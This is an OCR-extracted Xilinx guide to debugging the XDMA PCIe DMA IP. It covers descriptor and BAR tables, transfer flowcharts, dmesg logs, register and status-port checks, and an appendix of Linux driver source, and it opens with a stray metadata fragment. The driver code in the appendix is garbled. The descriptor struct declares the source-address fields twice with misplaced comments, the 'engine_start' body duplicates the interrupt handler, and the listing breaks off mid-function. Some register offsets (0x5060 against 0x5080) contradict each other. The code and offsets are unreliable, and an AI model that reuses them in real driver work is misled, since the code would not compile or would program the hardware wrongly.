[2892, 3064, 13], [3064, 3074, 14], [3074, 3084, 15], [3084, 3098, 16], [3098, 3546, 17], [3546, 3880, 18], [3880, 4182, 19], [4182, 4676, 20], [4676, 4686, 21], [4686, 4696, 22], [4696, 11404, 23], [11404, 17562, 24], [17562, 24758, 25], [24758, 30684, 26], [30684, 36117, 27], [36117, 40642, 28], [40642, 46855, 29], [46855, 53506, 30], [53506, 58558, 31]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 58558, 0.10386]]}
|
olmocr_science_pdfs
|
2024-11-24
|
2024-11-24
|
e503403f94eb9849fdb6eaed2e5ce0d793cd906e
|
Introduction
The Xilinx PCI Express DMA (XDMA) IP provides high performance Scatter Gather (SG) direct memory access (DMA) via PCI Express. Using the IP and the associated drivers and software one will be able to generate high throughput PCIe memory transactions between a host PC and a Xilinx FPGA.
This document provides tips and techniques for debugging XDMA IP issues. As an introduction, an overview of the XDMA architecture is provided along with its working mechanism. For more details, users are advised to check XDMA IP product guide (PG195).
At the end of this document, the details on how the XDMA IP legacy drivers, provided in (Xilinx Answer 65444), work has been described. The section has been introduced to provide users with the knowledge of the working mechanism of the drivers. If an advanced debugging is required, it is advised to add printf statements at different points in the provided driver source to narrow down the source of the issue.
DMA Architecture and Overview
The XDMA IP consists of the following interfaces as shown in Figure 1:
- **User Data Interface**
- AXI-MM (Memory Mapped) or AXI-ST (Streaming)
- Separate data port per channel in AXI-ST Interface; data port is shared between channels in the AXI-MM interface
- Up to 4 physical Read (H2C) and 4 Write (C2H) Data Channels
- Each channel enabled has a dedicated engine for H2C and C2H
- Descriptor module is common for all engines
- **Control Interfaces**
- AXI-MM Lite Master Control Interface
- AXI-MM Lite Slave Control Interface accessible from user application
- **DMA Bypass Interface**
- AXI-MM Bypass Port
- Enables Host direct access to user application
- **User Interrupts**
- Up to 16 user interrupts
**Status ports**
- Each channel has a status port
**AXI MM interface**
As shown in Figure 2, the AXI MM data port is shared among the configured channels. C2H channels will master reads on the AR bus and H2C channels will master writes on the AW bus.
AXI Stream Interface
When the IP is configured with the AXI Stream Interface option, each channel will have its own AXI Stream interface as shown in Figure 3.
**Figure 3 - XDMA AXI Stream Interface**
**Descriptor Format**
Table 1 shows descriptor formats. Descriptors reside in the host memory. Each descriptor has a source address, destination address, length, and a pointer to the next descriptor on the list unless the STOP bit is set. The Next_adjacent field indicates how many contiguous descriptors are in the next descriptor address.
<table>
<thead>
<tr>
<th>Offset</th>
<th>Field</th>
<th>Bit Index</th>
<th>Sub Field</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x0</td>
<td>Magic</td>
<td>15:0</td>
<td></td>
<td>16'had4b. Code to verify that descriptor is valid.</td>
</tr>
<tr>
<td></td>
<td>Nxt_adj</td>
<td>5:0</td>
<td></td>
<td>The number of additional adjacent descriptors after the descriptor located at the next descriptor address field. A block of adjacent descriptor cannot cross a 4K boundary.</td>
</tr>
<tr>
<td>0x04</td>
<td>Control</td>
<td>4</td>
<td>EOP</td>
<td>End of packet (AXI ST C2H only)</td>
</tr>
<tr>
<td></td>
<td></td>
<td>1</td>
<td>Completed</td>
<td>Set to (1) to interrupt after the engine has completed this descriptor.</td>
</tr>
<tr>
<td></td>
<td></td>
<td>0</td>
<td>Stop</td>
<td>Set to (1) to stop the engine when it completes this descriptor.</td>
</tr>
<tr>
<td>0x08</td>
<td>Len</td>
<td>[27:0]</td>
<td></td>
<td>Descriptor Data length</td>
</tr>
<tr>
<td>0x08 & 0x0C</td>
<td>Source Address</td>
<td>63:0</td>
<td></td>
<td>Source address for the DMA transfer</td>
</tr>
<tr>
<td>0x10 & 0x14</td>
<td>Destination Address</td>
<td>63:0</td>
<td></td>
<td>Destination address for the DMA transfer</td>
</tr>
<tr>
<td>0x18 & 0x1C</td>
<td>Next Descriptor Address</td>
<td>63:0</td>
<td></td>
<td>Address of the next descriptor in the list</td>
</tr>
</tbody>
</table>
XDMA BAR Routing
All of the requests from the host will be directed to different interfaces based on the BAR hit. Which interface corresponds to which BAR is shown in Table 2 and Table 3. PCIe to DMA interface is always selected by default. Figure 4 shows the routing mechanism for the incoming requests from the host when “PCIe to AXI Lite Master” and “PCIe to DMA Bypass interfaces” are enabled.
<table>
<thead>
<tr>
<th>Default</th>
<th>BAR0 (32-bit)</th>
<th>BAR1 (32-bit)</th>
<th>BAR2 (32-bit)</th>
</tr>
</thead>
<tbody>
<tr>
<td>PCIe to AXI Lite Master enabled</td>
<td>PCIe to AXI Lite Master</td>
<td>DMA</td>
<td></td>
</tr>
<tr>
<td>PCIe to AXI Lite Master and PCIe to DMA Bypass enabled</td>
<td>PCIe to AXI Lite Master</td>
<td>DMA</td>
<td>PCIe to DMA Bypass</td>
</tr>
<tr>
<td>PCIe to DMA Bypass enabled</td>
<td>DMA</td>
<td>DMA</td>
<td>PCIe to DMA Bypass</td>
</tr>
</tbody>
</table>
Table 2 - XDMA BAR Routing (32-bit) [Ref: PG195]
<table>
<thead>
<tr>
<th>Default</th>
<th>BAR0 (64-bit)</th>
<th>BAR2 (64-bit)</th>
<th>BAR4 (64-bit)</th>
</tr>
</thead>
<tbody>
<tr>
<td>PCIe to AXI Lite Master enabled</td>
<td>PCIe to AXI Lite Master</td>
<td>DMA</td>
<td></td>
</tr>
<tr>
<td>PCIe to AXI Lite Master and PCIe to DMA Bypass enabled</td>
<td>PCIe to AXI Lite Master</td>
<td>DMA</td>
<td>PCIe to DMA Bypass</td>
</tr>
<tr>
<td>PCIe to DMA Bypass enabled</td>
<td>DMA</td>
<td>DMA</td>
<td>PCIe to DMA Bypass</td>
</tr>
</tbody>
</table>
Table 3 - XDMA BAR Routing (64-bit) [Ref: PG195]
DMA Driver
The purpose of a DMA driver that sits in the host CPU is to prepare any peripheral DMA transfers, because only the operating system (OS) has full control over the memory system, the file system and the user space processes. First, the peripheral device’s DMA engine is programmed with the source and destination addresses of the memory ranges to copy. Second, the device is signaled to begin the DMA transfer and when the transfer is finished, usually, the device raises interrupts to inform the CPU about transfers that have finished. For each interrupt, an interrupt handler, previously installed by the driver, is called and the finished transfer can be acknowledged accordingly by the OS.
XDMA Linux Driver and Example Application
The XDMA driver provided in (Xilinx Answer 65444) consists of the following user accessible devices. The driver is provided as a reference. It is the user’s responsibility to modify the driver to add specific requirements, or build one from scratch, as per the need of their custom design.
- xdma0_control : to access XDMA registers
- xdma0_user : to access AXI-Lite Master interface
- xdma0_bypass : to access DMA-Bypass interface
- xdma0_h2c_0/1/2/3, xdma0_c2h_0/1/2/3 : to access each channel
There are three tests included in (Xilinx Answer 65444) which are as follows:
- run_test.sh : Script to do basic transfer
- Will load driver, find out if the design is AXI-MM or AXI_ST and see how many channels are enabled.
- Will do basic transfer to all enabled channels.
- Check for data integrity
- Report pass or fail
- load_driver.sh: loads driver
- perform_hwcount.sh: for hardware performance
**Example Application**
*(Xilinx Answer 65444)* provides the following applications:
- **dma_to_device**
- [AXI-MM] `dma_to_device -d /dev/xdma0_h2c_0 -f infile.bin -s 4096 -a 1000 -o 24`
- [AXI-ST] `dma_to_device -d /dev/xdma0_h2c_0 -f infile.bin -s 4096 -o 24`
- **dma_from_device**
- [AXI-MM] `dma_from_device -d /dev/xdma0_c2h_0 -f outfile.bin -s 4096 -a 1000 -o 24`
- [AXI-ST] `dma_from_device -d /dev/xdma0_c2h_0 -f outfile.bin -s 4096 -o 24`
- **reg_rw**
- Linux utility ‘dd’ can also be used for the DMA. Linux ‘dd’ is a basic Linux utility to copy. It also gives bandwidth information
- `dd if=/dev/zero of=/dev/xdma0_h2c_0 bs=4096 count=1`
- Will transfer 4Kbytes from Host to Card
- `dd of=/dev/null if=/dev/xdma0_c2h_0 bs=4096 count=1`
- Will transfer 4Kbytes from Card to Host
DMA Transfer flow for H2C and C2H
Register Programming during ‘driver load’ process
```
Load driver (setup)
Set ‘H2C Channel interrupt enable mask’ register 0x0090 (Table 2-49) to generate interrupts for corresponding bits.
Set ‘C2H Channel interrupt enable mask’ register 0x1090 (Table 2-68) to generate interrupts for corresponding bits.
Set ‘IRQ Block Channel Interrupt Enable Mask’ register 0x2010 (Table 2-81), enable all channels both H2C and C2H to generate interrupt.
```
© Copyright 2018 Xilinx
H2C Transfer
Application program initiates H2C transfer, with transfer length, buffer location where data is stored
Driver creates descriptors based on transfer length
Driver writes first descriptor base address to Address 0x4080 (Table 2-108) and 0x4084 (Table 2-109). Driver writes next adjacent descriptor count to 0x4088 (Table 2-110) if any.
Driver starts H2C transfer by writing to H2C engines control register, address 0x0004 (Table 2-40)
DMA initiates Descriptor fetch request for one or more descriptors (depending on adjacent descriptor count)
DMA receives one Descriptor or more descriptors (depending on adjacent descriptor count)
No
Is this the last descriptor
Yes
DMA sends read request to (Host) source address based on first available descriptor
DMA receives data from Host for that descriptor
Stop fetching data from Host
Yes
Transmit data on (Card) AXI-MM Master interface
Is there more data to transfer
No
Send interrupt to Host
Interrupt process. Read 'IRQ Block Channel Interrupt Request' 0x2044 (Table 2-85) to see which channels sent interrupt. Mask corresponding channel interrupt writing to 0x2018 (Table 2-83)
Driver Reads corresponding 'Status register' 0x0044 (Table 2-44) which will also clear status register. Read channel 'Completed descriptor count' 0x0048 (Table 2-45) and compare with number of descriptor generated.
Write to channel 'Control register' 0x0004 (Table 2-40) to stop dma run. Write to 'Block channel interrupt Enable Mask' 0x2014 (Table 2-82) to enable interrupt for next transfer. Return control to application program with transfer size
Yes
Exit application program
© Copyright 2018 Xilinx
In Figure 6, the actions performed by the XDMA driver (shown in yellow boxes) are also reflected in the dmesg log.
The snapshots below are excerpts from the dmesg log taken by running the test application (run_test.sh) that comes with the (Xilinx Answer 65444) driver.
Note: Some driver tasks, as explained in the flow chart, such as reading the completed descriptor count register and writing to the Block channel interrupt enable Mask register, are not explicitly visible in the dmesg log.
C2H Transfer
Figure 7 - C2H Transfer Flowchart [Ref: PG195]
Similar to the H2C transfer, below are excerpts from the dmesg log of a C2H transfer obtained by running the example application (run_test.sh).
Application program initiates C2H transfer, with transfer length, receive buffer location
Driver creates descriptors based on transfer length
Driver writes first descriptor base address to Address 0x5080 (Table 2-114) and 0x5084 (Table 2-115). Driver writes next adjacent descriptor count to 0x5088 (Table 2-116) if any
Driver starts C2H transfer by writing to C2H engines control register, address 0x1004 (Table 2-59)
DMA initiates Descriptor fetch request for one or more descriptors (depending on adjacent descriptor count)
DMA receives one Descriptor or more descriptors (depending on adjacent descriptor count)
DMA reads data from (Card) Source address for a given descriptor
Is this the last descriptor
Yes
Stop fetching descriptor from host
No
Is there any more descriptor left
Yes
Stop fetching data from Card
No
Is there more data to transfer
Yes
Send interrupt to Host
No
Transmit data to PCIe to (Host) Destination address
Interrupt process. Read 'IRQ Block Channel Interrupt Request' 0x2044 (Table 2-85) to see which channels sent interrupt
Mask corresponding channel interrupt writing to 0x2018 (Table 2-83)
Driver Reads corresponding 'Status register' 0x1044 (Table 2-63) which will also clear status register
Read channel 'completed descriptor count' 0x1048 (Table 2-64) and compare with number of descriptor generated.
Write to channel 'Control register' 0x1004 (Table 2-59) to stop dma run.
Write to 'Block channel interrupt Enable Mask' 0x2014 (Table 2-82) to enable interrupt for next transfer
Return control to application program with transfer size
Application program reads transfer data from assigned buffer and writes to a file
Exit application program
© Copyright 2018 Xilinx
Driver creates descriptors based on transfer length.
Driver writes first descriptor base address to Address 0x5060 and 0x5064 Driver writes next adjacent descriptor count to 0x5088 if any.
Driver starts C2H transfer by writing to C2H engines control register, address 0x1004.
Receives interrupt from DMA engine after transfer completion and services it.
Driver Reads corresponding ‘Status register’ 0x1044 which will also clears status register.
Write to channel ‘Control register’ 0x1004 to stop the DMA run.
Other Driver Options
- **Poll mode**
- No interrupts are used
- `insmod ../driver/xdma.ko poll_mode=1`
- **Descriptor Credit based transfer**
- Handshake between Software and Hardware
- Software gives descriptor credits for hardware to use
- once hardware finishes credits, it will wait for more credits
- In the current XDMA driver, ‘Descriptor Credit based transfer’ is supported only for C2H Streaming
- `insmod ../driver/xdma.ko enable_credit_mp=1`
**Windows Driver**
Windows driver concept is same as in Linux driver. Debug messages can be traced using Trace View program which is part of WDK. See the Windows Driver document in [Xilinx Answer 65444](https://www.xilinx.com) for details.
**lspci**
Figure 8 shows a sample lspci output log. Lspci is helpful in preliminary debug of XDMA in the Linux environment. The lspci log provides the following useful information pertaining to the XDMA operation.
- **BAR information**: One can check and confirm the BAR addresses that are assigned and the size of each BAR.
- **Link Status**: Shows the link status to reflect the actual trained link speed. This should be checked first if low throughput performance is observed than what is expected.
- **Interrupts**: The interrupts being used: Legacy, MSI, MSI-X.
- **Errors**: Gives details on all the uncorrectable errors, RX overflow etc.
- **Bus Master Capability**: Bus Master Capability is essential for DMA functionality. Whether the Bus Master feature is enabled or not can be checked in lspci log.
The lspci output also shows the kernel driver in use at the bottom of its output.
**Figure 8 - lspci sample output log for XDMA**
**Driver Debug**
By default Driver Debug messages are turned off (for better performance). To enable the debug messages, in "include/xdma-core.h", change `#define XDMA_DEBUG 0` to `#define XDMA_DEBUG 1`. This is for the legacy driver. For the latest driver provided in (Xilinx Answer 65444), do the following:
In xdma/libxdma.h file:
- Add `#define __LIBXDMA_DEBUG__`
- Set `XDMA_DEBUG` to `'1'` instead of `'0'`.
After making the change, compile the driver.
The `dmesg` command is used to print out the debug messages from the XDMA driver. Below are the important sections of the debug message log that a user should review when debugging driver issues.
© Copyright 2018 Xilinx
**Driver Load**
- BAR probing
- Channel probing
- Interrupt setup
**DMA Transfer**
- Messages for the entire transfer run
- Prints descriptor dump
- Shows register writes and reads
- Shows interrupt service routine
**BAR Probing**
The driver scans through all of the BARs of the endpoint device and shows which BAR is configured as a DMA BAR. Therefore, in the case of an error when loading the driver, you can check if the DMA configuration BAR is recognised by the driver or not. Figure 9 shows an example of the dmesg log when the BAR configuration is as follows:
- BAR 0: AXI-Lite Interface
- BAR 1: DMA
- BAR 2: DMA Bypass Interface
```plaintext
[ 86.349515] xdma 8800:01.00.0: irq 172 for MSI/MSI-X
[ 85.349547] request_regions():pci_request_regions()
[ 86.349550] map_single_bar():BAR0: 1048576 bytes to be mapped.
[ 86.349608] map_single_bar():BAR0 at 0xdf100000 mapped at 0xffffc9001250000, length=1048576(/1048576)
[ 86.349611] is_config_bar():BAR 0 is not XDMA config BAR, irq_id = 0, cfg_id = 0
[ 86.349612] map_single_bar():BAR1: 65536 bytes to be mapped.
[ 86.349621] map_single_bar():BAR1 at 0xdf200000 mapped at 0xffffc9001200000, length=65536(/65536)
[ 86.349623] is_config_bar():BAR 1 is the XDMA config BAR
[ 86.349624] map_single_bar():BAR2: 1048576 bytes to be mapped.
[ 86.349680] map_single_bar():BAR2 at 0xdf300000 mapped at 0xffffc9001270000, length=1048576(/1048576)
[ 86.349681] map_single_bar():BAR #3 is not present - skipping
[ 86.349682] map_single_bar():BAR #4 is not present - skipping
[ 86.349683] map_single_bar():BAR #5 is not present - skipping
[ 86.349685] set_dma_mask():sizeof(dma_addr_t) == 8
[ 86.349687] set_dma_mask():pci_set_dma_mask()
[ 86.349688] set_dma_mask():Using a 64-bit DMA mask.
[ 86.349700] msi_irq_setup():Using IRQ #49 with 0xffff880036121290
[ 86.349701] msi_irq_setup():Using IRQ #50 with 0xffff8800361212b8
[ 86.349713] msi_irq_setup():Using IRQ #51 with 0xffff8800361212e0
[ 86.349719] msi_irq_setup():Using IRQ #52 with 0xffff880036121308
[ 86.349725] msi_irq_setup():Using IRQ #53 with 0xffff880036121330
```
Figure 9 - BAR Configuration and Interrupt Setup dmesg log
**Interrupt Setup**
After BAR mapping, the interrupts get set up. If all three interrupts (Legacy, MSI, MSI-X) are enabled, the MSI-X interrupts take precedence. Figure 9 shows the IRQ numbers and offset addresses being allocated for the MIS-X interrupt.
**Channel Probing**
After probing the BARs and assigning interrupt numbers, the driver will probe all H2C and C2H DMA channels and create a DMA device for all configured channels. Figure 10 shows the DMA channels being probed by the driver when a single H2C and C2H channel are enabled in the IP. As seen in the log, it will create an engine only if it reads a non-zero engine ID.
© Copyright 2018 Xilinx
DMA Transfer
Figure 11 shows the dmesg log for a DMA transfer.
- **Descriptor Dump**: The driver dumps the Descriptor Field on to the message buffer.
- **Transfer Queue**: Starts DMA Engine
- **Interrupt service routine**: interrupt is serviced
- **DMA status read**: H2C engine status displayed and engine stopped
Case Study
Example 1:
Figure 12 shows an example of a bug where the probing failed when all three BARs (AXI lite, DMA, DMA bypass) are enabled. As shown in the dmesg log, the driver fails to determine BAR 1 as an XDMA config BAR because it returns a config_id of 0 instead of a valid value (0x1fc3). This bug has now been fixed in the IP.
Figure 12 - XDMA Probe Failure
Example 2:
Figure 13 shows a dmesg log when XDMA IP got stuck. It shows the H2C channel in BUSY state. The dmesg log is provided here to illustrate what to check during debugging hang scenarios.
Figure 13 - XDMA IP Busy State
Debug: Register/Ports Reads/Writes
The XDMA IP provides registers to help in debugging DMA issues. These registers can be read using reg_rw command provided with the driver in [Xilinx Answer 65444].
For example, `reg_rw /dev/xdma0_control 0x0000 w` will read register 0x0000
© Copyright 2018 Xilinx
Below are some of the registers that would be useful in debugging:
- Control register (0x0004 for H2C, 0x1004 for C2H)
- Status register (0x0040 for H2C, 0x1040 for C2H)
- Completed descriptor count (0x0048 for H2C, 0x1048 for C2H)
- Interrupt mask
- Interrupt request
To test whether the link is working or not, one could also write and read AXI-Lite Master as shown below:
- `reg_rw /dev/xdma0_user 0x0000 w`: Read
- `reg_rw /dev/xdma0_user 0x0000 w 0x01234567`: Write
**Debug: Status Register**
Table 4 shows the XDMA channel status register. The bits to check in the register are `descriptor_stopped` and `descriptor_completed`. Once transfer completes normally:
- Busy should be 0
- `descriptor_stopped` should be 1
- `descriptor_completed` should be 1
As the status register is cleared on reading once, the above two bits will not be set after the register is read manually.
Table 4 - XDMA Channel Status Register [Ref: PG195]
Debug: Other Registers
In case of a hang or partial completion:
- Check the CDC (completed descriptor count) Register
- 0x0048 for H2C, 0x1048 for C2H
- Check dmesg to see how many descriptors are generated
- Compare the CDC to the expected descriptor count
If there are no Channel interrupts:
- Check ‘Channel Interrupt Enables Mask’ Register
- 0x0090 for H2C, 0x1090 for C2H
- Check ‘IRQ Block Channel Interrupt Enable Mask’ Register - Offset: 0x2010
- Read ‘IRQ Block Interrupt Pending’ Register - Offset: 0x204C
- This shows whether there was interrupt from DMA channels. If it is not set, it means there are no interrupts from the channel source
- Read the ‘IRQ Block Channel Interrupt Request’ Register - Offset: 0x2044
- If not set, check the ‘IRQ Block Channel Interrupt Enable Mask’ Register
Figure 14 and Figure 15 show the Status, Control, Completed Descriptor Count registers of the H2C and C2H channels read after running the sample application run_test.sh provided in (Xilinx Answer 65444).
While running an application if there is a terminal freeze and XDMA_DEBUG was not enabled in the driver, status registers of the H2C and C2H channel can be read from a parallel terminal. Figure 16 shows a snapshot of H2C0 and C2H0 reads when the channel is actually performing a transfer; the BUSY bit (bit 0) in both channels is set to 1.
Debug: Status Ports
The status ports shown in Table 5 can be enabled from the IP Configuration GUI setting. To understand how the bits in these ports are set, run simulation of the provided example design. Make sure simulation goes through for the selected configuration and check for the corresponding control/status registers that do not get expected values in the system validation. For further debug analysis, check CQ, CC, RQ, RC and AXI interface signals.
Figure 17 shows a snapshot of an ILA capture when H2C data transfer is going on. It shows the h2c_sts busy bit set (bit 0 = 1). Also, note that data being sent out of internal PCIE hard block on the m_axis_rc interface as expected.
**Table 5 - XDMA Channel Status Ports [Ref: PG195]**
<table>
<thead>
<tr>
<th>Signal Name</th>
<th>Direction</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>h2c_sts [7:0]</td>
<td>Output</td>
<td>Status bits for each channel. Bit: 6: Control register’s ‘Run’ bit (Table 2.40) 5: IRQ event pending 4: Packet Done event (AXI4-Stream) 3: Descriptor Done event. Pulses for one cycle for each descriptor that is completed, regardless of the Descriptor.Complete field 2: Status register Descriptor_completed bit 1: Status register Descriptor_stopped bit 0: Status register busy bit</td>
</tr>
</tbody>
</table>
Figure 18 shows a snapshot of an ILA capture when C2H data transfer is ongoing. It shows c2h_sts busy bit set (bit 0 = 1). Also, note that data is being input to the internal PCIE hard block on the s_axis_rq interface as expected.
Appendix: Device Driver Source Code Analysis: C2H Transfer
For user reference and illustration purpose, a general analysis of the working mechanism of the device driver source code for C2H has been provided in this section. The source for H2C transfer is similar to the C2H transfer in theory so the details for the H2C transfer are not included. For the latest driver and the corresponding source, refer to (Xilinx Answer 65444).
The driver files for the XDMA IP are:
a. `xdma-core.c`
b. `xdma-core.h`
a. Header file that defines preprocessor switches, bits of SGDMA control register and bits of the SGDMA descriptor control fields.
A typical C2H flow sequence is as follows:
1. The user program allocates a buffer pointer (based on the size), passes the pointer to the read function with specific device (C2H) and data size.
2. The driver creates descriptors based on transfer length. The following code in the driver does this work.
In `xdma-core.h`, the variables for the descriptor are defined.
```c
struct xdma_desc {
u32 control; /* transfer length in bytes */
u32 bytes; /* source address (low 32-bit) */
u32 src_addr_lo; /* source address (high 32-bit) */
u32 src_addr_hi;
u32 src_addr_lo; /* destination address (low 32-bit) */
u32 src_addr_hi;
u32 dst_addr_lo; /* destination address (high 32-bit) */
u32 dst_addr_hi;
u32 next_lo; /* next desc address (low 32-bit) */
u32 next_hi;
};
```
© Copyright 2018 Xilinx
In `xdma-core.c`, the following code creates descriptors based on transfer length.
```c
static void xdma_desc_set(struct xdma_desc *desc, dma_addr_t rc_bus_addr, u64 ep_addr, int len, int dir_to_dev)
{
#if SD_ACCEL
/* length (in bytes) must be a non-negative multiple of four */
BUG_ON(len & 3);
#endif
/* transfer length */
desc->bytes = cpu_to_le32(len);
if (dir_to_dev) {
/* read from root complex memory (source address) */
desc->src_addr_lo = cpu_to_le32(PCI_DMA_L(rc_bus_addr));
desc->src_addr_hi = cpu_to_le32(PCI_DMA_H(rc_bus_addr));
/* write to end point address (destination address) */
desc->dst_addr_lo = cpu_to_le32(PCI_DMA_L(ep_addr));
desc->dst_addr_hi = cpu_to_le32(PCI_DMA_H(ep_addr));
} else {
/* read from end point address (source address) */
desc->src_addr_lo = cpu_to_le32(PCI_DMA_L(ep_addr));
desc->src_addr_hi = cpu_to_le32(PCI_DMA_H(ep_addr));
/* write to root complex memory (destination address) */
desc->dst_addr_lo = cpu_to_le32(PCI_DMA_L(rc_bus_addr));
desc->dst_addr_hi = cpu_to_le32(PCI_DMA_H(rc_bus_addr));
}
}
```
The above function is called in `transfer_build()`.
```c
static int transfer_build(struct xdma_transfer *transfer, u64 ep_addr,
int dir_to_dev, int non_incr_addr, int force_new_desc,
int userspace)
{
...........................................
...........................................
xdma_desc_set(transfer->desc_virt + j, cont_addr,
ep_addr, cont_len, dir_to_dev);
...........................................
...........................................
xdma_desc_set(transfer->desc_virt + j, cont_addr, ep_addr, cont_len,
dir_to_dev);
...........................................
...........................................
...........................................
return j;
}
```
The driver writes the next adjacent descriptor count to 0x5080 if any.
```c
static void xdma_desc_adjacent(struct xdma_desc *desc, int next_adjacent)
{
int extra_adj = 0;
/* remember reserved and control bits */
u32 control = le32_to_cpu(desc->control) & 0x0000f0ffUL;
u32 max_adj_4k = 0;
```
if (next_adjacent > 0) {
extra_adj = next_adjacent - 1;
if (extra_adj > MAX_EXTRA_ADJ) {
extra_adj = MAX_EXTRA_ADJ;
}
max_adj_4k = (0x1000 - ((le32_to_cpu(desc->next_lo)) & 0xFFF))/3);
if (extra_adj > max_adj_4k) {
extra_adj = max_adj_4k;
}
if (extra_adj < 0) {
printk("Warning: extra_adj<0, converting it to 0\n");
extra_adj = 0;
}
}
/* merge adjacent and control field */
control |= 0xAD4B0000UL | (extra_adj << 8);
/* write control and next_adjacent */
desc->control = cpu_to_le32(control);
}
The above function is called in the xdma_transfer function.
static struct xdma_transfer *transfer_create(struct xdma_dev *lro,
const char *start, size_t cnt, u64 ep_addr, int dir_to_dev, int non_incr_addr, int force_new_desc, int userspace) {
………………………………………………
………………………………………………
/* fill in adjacent numbers */
for (i = 0; i < transfer->desc_num; i++) {
xdma_desc_adjacent(transfer->desc_virt + i,
transfer->desc_num - i - 1);
}
/* initialize wait queue */
init_waitqueue_head(&transfer->wq);
return transfer;
}
The driver starts a C2H transfer by writing to the C2H engine control register address 0x1004.
In xdma-core.h, the engine control register is defined as follows:
struct engine_regs {
u32 identifier;
u32 control; /* This the C2H channel control register (0x0004)*/
u32 control_w1s;
u32 control_w1c;
u32 reserved_1[12];/* padding */
u32 status;
u32 status_rc;
u32 completed_desc_count;
u32 alignments;
u32 reserved_2[14];/* padding */
u32 poll_mode_wb_lo;
u32 poll_mode_wb_hi;
u32 interrupt_enable_mask;
u32 interrupt_enable_mask_w1s;
u32 interrupt_enable_mask_w1c;
u32 reserved_3[9]; /* padding */
u32 perf_ctrl;
© Copyright 2018 Xilinx
The following code in `xdma-core.c` writes to the control register of the C2H engine.
```c
static void engine_start_mode_config(struct xdma_engine *engine) {
/* write control register of SG DMA engine */
u32 w = (u32)XDMA_CTRL_RUN_STOP;
w |= (u32)XDMA_CTRL_IE_READ_ERROR;
w |= (u32)XDMA_CTRL_IE_DESC_ERROR;
w |= (u32)XDMA_CTRL_IE_DESC_ALIGN_MISMATCH;
w |= (u32)XDMA_CTRL_IE_MAGIC_STOPPED;
if (poll_mode) {
w |= (u32)XDMA_CTRL_POLL_MODE_WB;
} else {
w |= (u32)XDMA_CTRL_IE_DESC_STOPPED;
w |= (u32)XDMA_CTRL_IE_DESC_COMPLETED;
/* enable IE_IDLE_STOP only for AXI ST C2H and for perf test */
if (engine->streaming && !engine->dir_to_dev) {
w |= (u32)XDMA_CTRL_IE_IDLE_STOPPED;
}
if (engine->xdma_perf) {
w |= (u32)XDMA_CTRL_IE_IDLE_STOPPED;
}
}
}
```
The engine is started by the following function:
```c
static struct xdma_transfer *engine_start(struct xdma_engine *engine) {
/* iterate over C2H (PCIe write) */
for (channel = 0; channel < XDMA_CHANNEL_NUM_MAX; channel++) {
engine = lro->engine[channel][1];
/* engine present and its interrupt fired? */
if (engine && (engine->irq_bitmask & channel)) {
dbg_tfr("schedule_work(engine=%p)\n", engine);
schedule_work(&engine->work);
}
}
}
```
After the hardware sends an interrupt to the host, the driver acts again. It reads 'IRQ Block Channel Interrupt Request' 0x2044 to see which channel sent the interrupt.
```c
static irqreturn_t xdma_isr(int irq, void *dev_id) {
/* iterate over C2H (PCIe write) */
for (channel = 0; channel < XDMA_CHANNEL_NUM_MAX; channel++) {
engine = lro->engine[channel][1];
/* engine present and its interrupt fired? */
if (engine && (engine->irq_bitmask & ch irq)) {
dbg_tfr("schedule_work(engine=%p)/", engine);
schedule_work(&engine->work);
}
}
}
```
Disable channel interrupt by writing to 0x2018 as needed.
```c
/* channel_interrupts_disable -- Disable interrupts we are not interested in */
static void channel_interrupts_disable(struct xdma_dev *lro, u32 mask)
{
struct interrupt_regs *reg = (struct interrupt_regs *)
(lro->bar[lro->config_bar_idx] + XDMA_OFS_INT_CTRL);
write_register(mask, ®->channel_int_enable_w1c);
}
```
The Driver reads the corresponding 'Status Register' 0x1044 which will also clear the status register.
```c
static int engine_service(struct xdma_engine *engine, int desc_writeback)
{
............................................................
............................................................
/* Service the engine */
if (!engine->running) {
dbg_tfr("Engine was not running!!! Clearing status\n");
if (desc_writeback == 0)
engine_status_read(engine, 1);
return 0;
}
............................................................
............................................................
return rc;
}
```
The `engine_status_read` function is defined as follows.
```c
static u32 engine_status_read(struct xdma_engine *engine, int clear)
{
u32 value;
BUG_ON(!engine);
engine_reg_dump(engine);
/* read status register */
dbg_tfr("Status of SG DMA %s engine:\n", engine->name);
dbg_tfr("ioread32(0x%p):\n", &engine->regs->status);
if (clear) {
value = engine->status =
read_register(&engine->regs->status_rc);
} else {
value = engine->status = read_register(&engine->regs->status);
}
dbg_tfr("status = 0x%08x: %s%s%s%s%s%s%s\n", (u32)engine->status,
(value & XDMA_STAT_BUSY) ? "BUSY " : "IDLE ",
(value & XDMA_STAT_DESC_STOPPED) ? "DESC_STOPPED " : "",
(value & XDMA_STAT_DESC_COMPLETED) ? "DESC_COMPLETED " : "",
(value & XDMA_STAT_ALIGN_MISMATCH) ? "ALIGN_MISMATCH " : "",
(value & XDMA_STAT_MAGIC_STOPPED) ? "MAGIC_STOPPED " : "",
(value & XDMA_STAT_FETCH_STOPPED) ? "FETCH_STOPPED " : "");
}
```
The code reads the Read Channel 'Completed descriptor count' register at 0x1048.
```c
if (desc_count == 0)
desc_count = read_register(&engine->regs->completed_desc_count);
```
The completed descriptor count is defined in the `xdma.c` file as shown below.
```c
struct engine_regs {
u32 identifier;
u32 control;
u32 control_w1s;
u32 control_w1c;
u32 reserved_1[12]; /* padding */
u32 status;
u32 status_rc;
u32 completed_desc_count;
u32 alignments;
u32 reserved_2[14]; /* padding */
u32 poll_mode_wb_lo;
u32 poll_mode_wb_hi;
u32 interrupt_enable_mask;
u32 interrupt_enable_mask_w1s;
u32 interrupt_enable_mask_w1c;
u32 reserved_3[9]; /* padding */
u32 perf_ctrl;
u32 perf_cyc_lo;
u32 perf_cyc_hi;
u32 perf_dat_lo;
u32 perf_dat_hi;
u32 perf_pnd_lo;
u32 perf_pnd_hi;
} __packed;
```
The code below shows a write to the 'Channel Control Register' at 0x1004 to stop DMA run.
```c
/**
* xdma_engine_stop() - stop an SG DMA engine
*/
static void xdma_engine_stop(struct xdma_engine *engine)
{
u32 w;
BUG_ON(!engine);
dbg_tfr("xdma_engine_stop(engine=%p)\n", engine);
w = 0;
w |= (u32)XDMA_CTRL_IE_DESC_ALIGN_MISMATCH;
```
w |= (u32)XDMA_CTRL_IE_MAGIC_STOPPED;
w |= (u32)XDMA_CTRL_IE_READ_ERROR;
w |= (u32)XDMA_CTRL_IE_DESC_ERROR;
if (poll_mode) {
